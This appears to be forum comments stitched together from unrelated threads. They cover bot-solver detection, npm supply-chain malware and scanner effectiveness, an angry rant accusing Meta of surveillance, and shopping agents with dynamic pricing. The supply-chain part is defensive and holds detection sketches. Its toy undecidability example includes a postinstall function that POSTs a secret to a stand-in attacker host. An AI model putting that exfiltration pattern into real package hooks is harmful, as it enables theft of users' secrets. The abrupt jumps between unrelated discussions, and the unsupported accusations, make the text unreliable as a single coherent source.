The solvers are a problem, but they give themselves away when they incorrectly fake devices or run out of context. I run a bot detection SaaS and we've had some success blocking them. Their advertised solve times are also wildly inaccurate: they take ages to return a successful token, if at all. The number of companies providing bot mitigation is also growing rapidly, making it difficult for the solvers to keep up with reverse engineering every vendor's defences.
That's a good question. I haven't checked the stats to see how often it happens, but I'll make a note to return with some info. We're dealing with the entire internet, not just YC companies, and many scrapers/solvers will pass up a user agent that doesn't quite match the JS capabilities you would expect of that browser version. Some solving companies let you supply your own user agent, which causes inconsistencies because they don't change their stack to match the user agent you supply. Under the hood they're running whatever version of headless Chrome they're currently pinned to.
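For illustration, here's a minimal sketch of that kind of consistency check (not our production logic; the feature-to-version pairs and helper names are made up for the example):

```typescript
// Sketch: flag clients whose claimed Chrome version is inconsistent with what
// their JS engine actually supports, e.g. a solver pinned to an old headless
// Chrome while forwarding the customer's newer user agent string.

interface ClientProbe {
  userAgent: string;                          // what the client claims to be
  supportsFeature: Record<string, boolean>;   // results of client-side feature tests
}

// Illustrative mapping: Chrome major version in which each API first shipped.
const FEATURE_MIN_CHROME: Record<string, number> = {
  "Array.prototype.at": 92,
  "Array.prototype.findLast": 97,
  "structuredClone": 98,
};

function claimedChromeMajor(ua: string): number | null {
  const m = ua.match(/Chrome\/(\d+)/);
  return m ? parseInt(m[1], 10) : null;
}

function isInconsistent(probe: ClientProbe): boolean {
  const claimed = claimedChromeMajor(probe.userAgent);
  if (claimed === null) return false; // not claiming Chrome; other checks apply

  for (const [feature, minVersion] of Object.entries(FEATURE_MIN_CHROME)) {
    const supported = probe.supportsFeature[feature];
    if (supported === undefined) continue;                 // feature not probed
    if (claimed >= minVersion && !supported) return true;  // claims newer than the engine
    if (claimed < minVersion && supported) return true;    // claims older than the engine
  }
  return false;
}
```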
> automated scanners seem to do a good job already of finding malicious packages.
That's not true. This latest incident was detected by an individual researcher, just like many similar attacks in the past. Time and again, it's been individuals who flagged these issues and later reported them to security startups, not automated tools. Don't fall for the PR spin.
If automated scanning were truly effective, we'd see deployments across all major package registries. The reality is, these systems still miss what vigilant humans catch.
> This latest incident was detected by an individual researcher
So that still seems fine? Presumably researchers are focusing on the latest releases, so their work would not be impacted by other people using this new pnpm option.
> If automated scanning were truly effective, we'd see deployments across all major package registries.
No we wouldn't. Most package registries are run by either bigcorps at a loss or by community maintainers (with bigcorps again sponsoring the infrastructure).
And many of them barely go beyond the "CRUD" of package publishing due to lack of resources. The economic incentives of building up supply chain security tools into the package registries themselves are just not there.
You're right that registries are under-resourced. But if automated malware scanning actually worked, we'd already see big tech partnering with package registries to run continuous, ecosystem-wide scanning and detection pipelines. That isn't happening. Instead, we see piecemeal efforts: Google with assurance artifacts (SLSA provenance, SBOMs, verifiable builds), Microsoft sponsoring OSS maintainers, Facebook donating to package registries. Google's initiatives stop short of claiming they can automatically detect malware.
This distinction matters. Malware detection is, in the general case, an undecidable problem (think the halting problem and Rice's theorem). No amount of static or dynamic scanning can guarantee catching malicious logic in arbitrary code. At best, scanners detect known signatures, patterns, or anomalies. They can't prove the absence of malicious behavior.
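To make the undecidability point concrete, here's a toy example (the function names and URL are invented for illustration). A scanner that wants to prove the exfiltration call is unreachable has to decide whether the arbitrary computation before it terminates, which is exactly a halting-style question:

```typescript
// Toy illustration only: not taken from any real package.

function mysteryComputation(n: bigint): void {
  // Stands in for arbitrary attacker-supplied code. Even this simple
  // Collatz-style loop has no known general termination proof.
  while (n !== 1n) {
    n = n % 2n === 0n ? n / 2n : 3n * n + 1n;
  }
}

async function postinstall(secret: string, seed: bigint): Promise<void> {
  mysteryComputation(seed);

  // Only reachable if the call above returns, so "proving" this package
  // benign in general means solving the halting problem.
  await fetch("https://attacker.invalid/exfil", { method: "POST", body: secret });
}
```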
So the reality is: if Google's assurance artifacts stop short of claiming automated malware detection is feasible, it's a stretch for anyone else to suggest registries could achieve it "if they just had more resources." The problem space itself is the blocker, not just lack of infra or resources.
> But, if automated malware scanning actually worked, we'd already see big tech partnering with package registries to run continuous, ecosystem-wide scanning and detection pipelines.
I think this sort of thought process is misguided.
We do see continuous, ecosystem-wide scanning and detection pipelines. For example, GitHub supports Dependabot, which runs supply chain checks.
What you don't see is magical rabbits being pulled out of top hats. The industry has decades of experience with anti-malware tools in contexts where said malware runs in spite of not being explicitly provided deployment or execution permissions. And yet it deploys and runs. What do you expect if you make code intentionally installable and deployable, and capable of sending HTTP requests to send and receive any kind of data?
Contrary to what you are implying, this is not a simple problem with straightforward solutions. The security model has relied heavily on the role of gatekeepers, on both the producer and consumer sides. However, the latest batch of popular supply chain attacks circumvented the only failsafe in place. Beyond this point, you just have a module that runs unspecified code, just like any other module.
The latest incident was detected first by an individual researcher (haven't verified this myself, but trusting you here) -- or maybe s/he was just the fastest reporter in the west. Even simple heuristics like the sudden addition of high-entropy code would have caught the most recent attacks, and obviously there are much better methods too.
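For what it's worth, here's roughly what that entropy heuristic could look like; the thresholds and the release-to-release comparison are my own illustration, not any particular vendor's pipeline:

```typescript
// Sketch: flag a new release whose long string literals are suddenly much
// higher-entropy than anything in the previous release (base64 blobs, packed
// eval payloads, hex arrays, etc.).

function shannonEntropy(s: string): number {
  const counts = new Map<string, number>();
  for (const ch of s) counts.set(ch, (counts.get(ch) ?? 0) + 1);
  let h = 0;
  for (const c of counts.values()) {
    const p = c / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Pull long string literals out of a source file; obfuscated payloads tend to hide in them.
function longStringLiterals(source: string, minLen = 100): string[] {
  const literals = source.match(/(["'`])(?:\\.|(?!\1).)*\1/gs) ?? [];
  return literals.filter((lit) => lit.length >= minLen);
}

function looksSuspicious(previousRelease: string, newRelease: string): boolean {
  const before = longStringLiterals(previousRelease).map(shannonEntropy);
  const after = longStringLiterals(newRelease).map(shannonEntropy);
  const maxBefore = Math.max(0, ...before);
  const maxAfter = Math.max(0, ...after);
  // English-like source sits around 4 bits/char; base64 and packed payloads
  // are closer to 5.5-6. A sudden jump between releases is worth a human look.
  return maxAfter > 5.2 && maxAfter - maxBefore > 1.0;
}
```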
Quite possibly - there have been several incidents recently, with a number of researchers working together, so it's not clear exactly who found what first. And it's definitely not as simple to fix as tossing a tool in place.
For example, the CEO of socket.dev described an automated pipeline that flags new uploads for analysts, which is good but not instantaneous:
The Aikido team also appear to be saying they investigated a suspicious flag (apologies if I'm misreading their post), which again takes time for analysts to work through:
My thought was simply that these were caught relatively quickly by security researchers rather than by compromised users reporting breaches. If you didn't install updates within a relatively short period after they were published, the subsequent response would keep you safe. Obviously that's not perfect, and a sophisticated, patient attack like the one liblzma suffered would likely still be possible, but there really does seem to be value in something like Debian's unstable/stable divide, where researchers and thrill-seekers get everything ASAP but most people give it some time to be tested. What I'd really like to see is a community model for funding that, and especially for supporting independent researchers.
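To sketch the consumer-side version of that cool-down (purely illustrative; the new pnpm option mentioned earlier in the thread is aimed at the same idea), you can check a version's age against the `time` field in the public npm registry metadata before allowing an install:

```typescript
// Sketch: refuse to install versions published less than `minDays` ago,
// using the public npm registry's package document (its `time` field maps
// each version to a publish timestamp).

const REGISTRY = "https://registry.npmjs.org";

async function isOldEnough(pkg: string, version: string, minDays = 7): Promise<boolean> {
  const res = await fetch(`${REGISTRY}/${encodeURIComponent(pkg)}`);
  if (!res.ok) throw new Error(`registry lookup failed: ${res.status}`);
  const doc = (await res.json()) as { time?: Record<string, string> };

  const published = doc.time?.[version];
  if (!published) return false; // unknown version: be conservative

  const ageMs = Date.now() - new Date(published).getTime();
  return ageMs >= minDays * 24 * 60 * 60 * 1000;
}

// Usage: only proceed with the install if this resolves to true, e.g.
// await isOldEnough("some-package", "1.2.3");
```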
> managed pull-through caches implemented via tools like Artifactory
This is why package malware makes the news but enterprises that mirror package registries rarely get hit. Building a mirroring solution will be pricey, though, mainly due to high egress bandwidth costs from cloud providers.
Why should MS buy any of these startups when a developer (not any automated tech) found the malware? It looks like these startups did after-the-fact analysis for PR.
On the other hand, the previous supply chain attack was found by automated tooling.
Also, if MS would be so kind as to run similar scans at the time a package is updated, instead of after the fact (which is the only point at which automated tooling can run if npm doesn't integrate it), then malware like this would be far less common.
Hi, I'm Charlie from Aikido, as mentioned above. Yes, we detected it automatically, and I alerted Josh to the situation on BSky.
There's no reason why Microsoft/npm can't do what we're doing, or any of the other handful to dozen companies that do similar things to us, to protect the supply chain.
Any self-respecting individual would be ashamed of the kind of shady practices we have seen from this company; Zuck is the exception. He has done more to rot the collective brain of a generation than any single figure in tech history.
The truth is, Meta isn’t building community, it’s building a surveillance hellscape where every click, glance, and pause is commodified. If you work there and still believe you're doing something good for the world, you're either delusional or willfully blind.
They have been running a sniffer agent on localhost so they can track you over VPN and incognito. Why are people still using Meta crap? They are a surveillance/spyware company.
> In short, it's not consumers who want robots to buy for them, it's producers who want robots to buy from them using consumers dollars.
This. Humans are lazy and often don't provide enough data on exactly what they are looking for when shopping online. In contrast, agents can ask follow-up questions and provide a lot more contextual data to the producers, along with the history of past purchases, derived personal info, and more. I'd not be surprised if this info is consumed to offer dynamic pricing in e-commerce. We already see dynamic pricing employed by travel apps (airfares, Uber).